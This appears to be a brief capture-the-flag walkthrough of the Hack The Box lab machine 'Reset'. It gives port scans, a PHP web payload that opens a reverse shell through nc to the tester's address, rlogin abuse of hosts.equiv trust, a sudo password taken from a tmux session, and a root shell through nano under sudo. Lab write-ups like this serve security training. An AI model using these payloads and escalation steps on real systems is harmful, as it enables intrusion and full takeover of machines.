Reset

#easy #linux #logPoisoning

https://app.hackthebox.com/machines/Reset

sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv 10.129.101.101 -oA allPorts

PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 63
80/tcp  open  http    syn-ack ttl 63
512/tcp open  exec    syn-ack ttl 63
513/tcp open  login   syn-ack ttl 63
514/tcp open  shell   syn-ack ttl 63

echo -n $(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',') | xclip -sel clip

nmap -p 22,80,512,513,514 -sCV -Pn -n -vv 10.129.101.101 -oA openPortsServiceVersions

PORT    STATE SERVICE REASON         VERSION
22/tcp  open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 6a:16:1f:c8:fe:fd:e3:98:a6:85:cf:fe:7b:0e:60:aa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyAf6GPee+rQqSK2Xs/sDBPHvOh109nei1YDinqEqeQRyHAu7cYctKMIK5CFZojCtyJqLBB5Tmw7v6si1cjyBY=
|   256 e4:08:cc:5f:8e:56:25:8f:38:c3:ec:df:b8:86:0c:69 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILiu1L4RnPAcunzYAHckqjzFY2I4PHhzCheH+7SMZKnS
80/tcp  open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Admin Login
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
512/tcp open  exec    syn-ack ttl 63 netkit-rsh rexecd
513/tcp open  login?  syn-ack ttl 63
514/tcp open  shell   syn-ack ttl 63 Netkit rshd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

http://10.129.101.101/

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.137 1111 >/tmp/f'); ?>

nc -lnvp 1111

www-data@reset:/var/www/html$ ls /home/*
ls: cannot open directory '/home/local': Permission denied
/home/sadm:
user.txt
www-data@reset:/var/www/html$ cat /home/sadm/user.txt

19ba************************69a4

www-data@reset:/var/www/html$ cat /etc/hosts.equiv
# /etc/hosts.equiv: list  of  hosts  and  users  that are granted "trusted" r
#		   command access to your system .
- root
- local
+ sadm

❯ su sadm
Contraseña:
$ rlogin -l sadm 10.129.234.130
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-140-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Sep 24 03:53:17 PM UTC 2025

  System load:           0.0
  Usage of /:            65.2% of 5.22GB
  Memory usage:          13%
  Swap usage:            0%
  Processes:             243
  Users logged in:       1

sadm@reset:~$ ps aux
sadm        1225  0.0  0.1   8636  3956 ?        Ss   14:15   0:00 tmux new-session -d -s sadm_session

sadm@reset:~$ tmux attach -t sadm_session

echo 7lE2PAfVHfjz4HpE | sudo -S nano /etc/firewall.sh
sadm@reset:~$ echo 7lE2PAfVHfjz4HpE | sudo -S nano /etc/firewall.sh
Too many errors from stdin
sadm@reset:~$ sudo -l
Matching Defaults entries for sadm on reset:
    env_reset, timestamp_timeout=-1, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, !syslog

User sadm may run the following commands on reset:
    (ALL) PASSWD: /usr/bin/nano /etc/firewall.sh
    (ALL) PASSWD: /usr/bin/tail /var/log/syslog
    (ALL) PASSWD: /usr/bin/tail /var/log/auth.log

sudo /usr/bin/nano /etc/firewall.sh

^R ^X

Command to execute: reset; bash 1>&0 2>&0

root@reset:/home/sadm# whoami
root
root@reset:/home/sadm# cd
root@reset:~# ls
root_279e22f8.txt  snap
root@reset:~# cat root_279e22f8.txt

7ad6************************29b0

PreviousRedPanda NextRetro

Last updated 4 months ago